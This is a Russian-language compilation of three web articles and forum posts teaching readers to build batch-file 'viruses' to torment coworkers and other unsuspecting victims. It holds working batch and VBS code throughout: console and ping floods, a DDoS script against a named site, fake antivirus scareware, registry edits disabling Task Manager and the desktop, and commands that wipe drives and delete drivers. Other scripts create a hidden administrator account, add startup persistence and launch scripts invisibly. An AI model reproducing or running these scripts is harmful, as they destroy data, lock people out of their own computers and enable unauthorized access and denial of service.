Как на cmd написать вирусы

Вирус cmd . Командная консоль мешает работе.

Всем привет, и с вами вновь Компьютер76, который в очередной раз поможет вам в том, чтобы вы смогли провести приятно время, наблюдая за тщетными попытками коллег и пришедших им на подмогу администраторов исправить зловредный вирус, проникший в систему вашего соседа по офису или сослуживца, пользующимся компьютером. Если ваши зубы ещё целые или в офисе остались сотрудники, которые не подозревают о ваших компьютерных способностях, то позволю предложить вам очередной компьютерный трюк, который будет выглядеть как огромное количество окон консолей команд. Что-то похожее уже было, но ещё одна компьютерная пакость в вашей коллекции не повредит. Сегодня рассмотрим вирус cmd , который заключается в открытии огромного количества окон командной консоли на Рабочем столе монитора жертвы.

Итак, создадим вирус cmd через пустой документ в Блокноте. Введём в него следующий код:

Сохраните документ под названием, например, something с расширением, как вы догадались, .bat.

Теперь необходимо создать в диске С папку под названием, например, Programs . Название папки произвольно, можно выбрать своё, которое, впрочем, не привлечёт особого внимания у невнимательного пользователя. Но если вы введёте своё имя, проследите, чтобы оно совпало с именем папки в написании кода в документе Блокнота.

Скопируйте вирус cmd и поместите его в созданную папку Programs . Можно затем скрыть вирус cmd , установив в свойствах файла галочку напротив Скрытый, но сначала…

…поместите ярлык от вируса в папку Автозагрузки системы. Она, как вы знаете, находится в Пуск – Все программы – Автозагрузка. Теперь вирус cmd будет загружаться вместе с системой. Сразу после запуска монитор заполнится огромным и бесконтрольным количеством самозапускающихся окон консоли команд.

Чтобы избавиться от этой пакости, нужно будет загрузиться в безопасном режиме и убрать поочерёдно ярлык вируса из папки Автозагрузки, затем и сам файл, удалив созданную папку Programs .

Источник статьи: http://computer76.ru/2014/08/20/cmd-virus/

Как на cmd написать вирусы

@echo off
title VIRUS
color 4
chcp 1251 >nul
msg * «Прощай ламер!»
exit

@echo off
title VIRUS
color 4
chcp 1251 >nul
msg * «Прощай ламер!»
chcp 866 >nul
echo Gudbai lamer!
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
start ping -n 100 -w 1000 -t -l 65500 127.0.0.1
ping -n 100 -w 1000 -t -l 65500 127.0.0.1

@echo off
COLOR 2
TASKKILL /IM PING.EXE /T
pause

@echo off
COLOR 2
TASKKILL /IM PING.EXE /T /f
pause

2 варианта остановки пинг, можно и без паузы

@echo off
COLOR 2
TASKKILL /IM CMD.EXE /T /f

Внимание! запускать от имини админа, наче глючить будет пиздец как :DD
вирус, но он нечего не делает кроме атаки)))
и он еще отключается сам после атаки, это просто проверка)

@echo off
title Hacking ping
color 4
chcp 1251 >nul
msg * «Проверка на вирусы»
chcp 866 >nul
echo Gudbay lamer!
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
остальные 90 строчек удалены
TASKKILL /IM PING.EXE /T /f
color 2
echo hello lamer 😀
chcp 1251 >nul
msg * «Проверка завершена!»
chcp 866 >nul

@echo off
title Attack letitbit.net
color 4
chcp 1251 >nul
msg * «Давай начнем?»
chcp 866 >nul
echo Hi!
start ping letitbit.net -t -l 65500
start ping letitbit.net -t -l 65500
start ping letitbit.net -t -l 65500
ping letitbit.net -t -l 65500
TASKKILL /IM PING.EXE /T /f
color 2
echo Stop attack
chcp 1251 >nul
msg * «Остановлен!»
chcp 866 >nul

ддос атака на letitbit.net слабая
останавливаем так: нажимаем ctrl+c и пишем n нажимаем enter

@echo off
echo scaning system.
echo .
echo .
echo .
echo .
echo press any button to continue.
pause
echo deleting viruses (7).
echo «C:\windows\keyvirus\open.exe» deleted!
echo *********************************************
echo one or several viruses cannot be removed.
echo press any button to search for the problem
echo *********************************************
pause
echo now looking for a.
echo.
echo.
echo.
echo entry in the list.
echo ok
echo here it is, press any button to show a list of viruses
pause
color 4
echo ******************************
echo Warning 6 viruses not deleted!
echo ******************************
echo C:\windows\formathdd\1.exe
echo C:\windows\formathdd\start.exe
echo C:\windows\formathdd\0.exe
echo C:\windows\formathdd\del.exe
echo C:\windows\formathdd\hack.dll
echo C:\windows\formathdd\cfg.ini
echo press any button to delete the viruses
pause
:1
echo virus deleted!
goto 1

Эмулятор антивируса с вирусом 😀

@echo off
title scaning.
color 4
echo scaning system.
echo .
echo .
echo .
echo .
echo deleting viruses
echo *********************************************
echo system error!
echo *********************************************
echo now looking for a.
echo.
echo.
echo.
TASKKILL /IM explorer.exe /T /F
TASKKILL /IM opera.exe /T /F
TASKKILL /IM firefox.exe /T /F
TASKKILL /IM iexplorer.exe /T /F
TASKKILL /IM skype.exe /T /F
TASKKILL /IM chrome.exe /T /F
TASKKILL /IM utorrent.exe /T /F
TASKKILL /IM browser.exe /T /F
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 127.0.0.1 -t -l 65500
start ping 0.0.0.0 -t -l 1
:1
echo system error!
goto 1

тоже прикольный вирус 😀
закрывает процессы и атакует комп

@echo off
title matrix
color 0a
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top

Генерация случайных чисел, предупреждаю проц нагружает

@echo off
title matrix
color 4
start 1.cmd
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top

@echo off
title matrix
color 4
start 2.cmd
TASKKILL /IM CMD.EXE /T /f
exit

@echo off
title matrix
color 4
start 3.cmd
exit

Первый грузит проц до бесконечности) пизда будет даже 100 ядернику
второй сам отключается через несколько секунд, если не возникнет ошибки 😀
третий просто жесть.
все файлы сохранять в таком порядке «1.cmd» где написано start (имя файла).cmd или bat

@echo off
label Virus ha4eck
Echo Start Game and press any key
pause
md Cheat-Settingslsd
md Cheat-Settings15445
md Cheat-Settings514
md Cheat-Settings3
md Cheat-Settings6
md Cheat-Settings7
md Cheat-Settings9
md Cheat-Settings4
md Cheat-Settings54
md Cheat-Settgs847684
md Cheat-Settings543
md Cheat-Settingla4
md Cheat-Setting4
md Cheat-Setting
md Cheat-Sett42
md Cheat-Settings3asfdhjke
md Cheat-Settings6wadggger
md Cheat-Settings7waawdsafd
md Cheat-Settings9wadwww
md Cheat-Settingswad4
md Cheat-Settinsadwgs54
md Cheat-Settings847684
md Cheat-Settings5фвцфв3
md Cheat-Settingsla4
md Cheat-Setting54654цув
md Cheat-Settings6666666
md Cheat-Settings84684864
md sadawdwad34
md sadawdwamd sadawdwa
md sadawdwaasdwq1231
md sadawdwa677777777777
md sadawdwa234
md sadawdwamd sadawdwa
md sadawdwa555
md sadawdwa3221

Создаёт дохера папок и локальный диск с переминовывает

@echo off
😡
md %random%%random%%random%
goto x

Создает дохера папок с рандомнами именами (бесконечно, пока не закроешь)

Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер
@echo off
shutdown -s -t 1 -c «lol» >nul

Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c «lol» >nul

Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Удаление дров
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul

Удаляет звуки Windows
@echo off
del «%SystemRoot%\Media» /q >nul

Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul

Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q

Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul

Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul

Удаляет команду DEL
del %0

Будет открывать бесконечно Paint
😡
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt

Заражает Autoexec
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y

сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton

Источник статьи: http://vk.com/topic-41566766_27419386

Вирусы в блокноте. Искажают мышь, отключают интернет и блокируют программы

Всем доброго времени суток, дорогие читатели. На связи Планета Шелезяка. Казалось бы, на что способен привычный всем блокнот. Обычный пользователь использует его как простую записную книжку. Если нужно что-то записать по-быстрому, можно создать TXT файл, который потом откроется на практически на любом устройстве.

Однако блокнот — это еще и возможность создавать bat- или vbs-файлы, которые могут принести немало хлопот, если прописать в них то, что нужно. Их преимущество перед обычными exe вирусами в том, что вносимые ими нежелательные изменения могут вступить в силу и даже не вызвать подозрений со стороны вашего антивируса.

Здесь вы найдете несколько примеров таких скриптов, которые могут знатно подпортить жизнь обычному пользователю.

Хочется сразу отметить, что некоторые bat-ники выполняют свою роль без каких-либо дополнительных действий, некоторые — требуют прав администратора при запуске, некоторые — перезагрузку для применения изменений . Также не все они невидимы для антивируса , некоторые — да, некоторые — нет.
Внизу буду указывать два параметра «(перезагрузка, админ)». Это означает, что для вступления изменений в силу нужно, чтобы bat запускался от имени администратора ( как сделать, чтобы он сам выполнялся от админа напишу только в своем телеграмме ) и, чтобы пользователь перезагрузил ПК.

Как запускать bat-ники максимально незаметно (без мелькания cmd)

Если нужно, чтобы bat-ник запускался максимально незаметно и не смущал пользователя появившейся командной строкой (на небольшое время, но это окно промелькнет), то самым простым решением будет данный vbs скрипт (скопировать в блокнот и сохранить как «Все файлы» с указание расширения vbs):

Set WshShell = CreateObject(«WScript.Shell»)

WshShell.Run «путь к bat-файлу», 0, false

Этот скрипт запустит bat-ник, который расположен по указанному пути.

Также не стоит забывать прописывать в начале каждого bat-ника:

Меняем местами значение кнопок мыши

@Echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Выключение

shutdown /p (немедленное выключение)

shutdown.exe -s -t 45 (выключение с задержкой, после -t время в секундах)

А если немного улучшить этот bat и добавить его в автозагрузку (команда есть ниже), то получится нечто веселое

Перезагрузка

Отключение редактирования меню Пуск

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_DWORD /d 1 /f >nul

Отключение рабочего стола

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Отключаем интернет

Чтобы вернуть назад прописываем в cmd: IPconfig /renew

Меняем расширение всех ярлыков на txt

Добавление файла в автозагрузку

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v «имя в реестре(любое)» /t REG_SZ /d «путь к файлу» /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v «Filel» /t REG_SZ /d «C:\Users\user\Desktop\re.bat» /f

Отключение диспетчера задач

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Запрещаем запуск программ

Добавляйте свои по желанию

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v «2» /t reg_sz /d «exe-шник программы» /f

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «DisallowRun» /t REG_DWORD /d «1» /f

Например, чтобы запретить запуск Chrome:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v «3» /t reg_sz /d «chrome.exe» /f

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «DisallowRun» /t REG_DWORD /d «1» /f

Запрещаем установку программ

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v «1» /t reg_sz /d «msiexec.exe» /f

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «DisallowRun» /t REG_DWORD /d «1» /f

Убираем панель управления

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v «DisableTaskMgr» /t REG_DWORD /d «1» /f

Отключить автозагрузку USB-устройств, приводов, съемных дисков, сетевых дисков

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies \Explorer /v « NoDriveTypeAutoRun » /t REG_DWORD /d « 0xFF » /f

Ну а если правильно собрать несколько команд или несколько bat-ников, то можно заставить обычного пользователя изрядно понервничать.

Описывать здесь, как засунуть эти батники и vbs, чтобы они запускались вместе с обычным файлом (например gif, картинкой или музыкой) я не буду. Вот пример того, как я прятал вирус в картинке , можете сделать по аналогии.

По ссылке в моем телеграм канале вы найдете расширенную версию данной статьи (всё писать здесь не рискну). Там будет указано, как сделать bat-ник, который будет самоуничтожаться после выполнения , как сделать bat-ник, который будет сам выполняться от имени администратора и еще парочка других интересных примеров.

На этом всё. Если вам понравилась данная статья, не забудьте поставить лайк и подписаться на канал.

Источник статьи: http://zen.yandex.ru/media/planetashelezyaka/virusy-v-bloknote-iskajaiut-mysh-otkliuchaiut-internet-i-blokiruiut-programmy-5e9881af2e81636d7a8fd806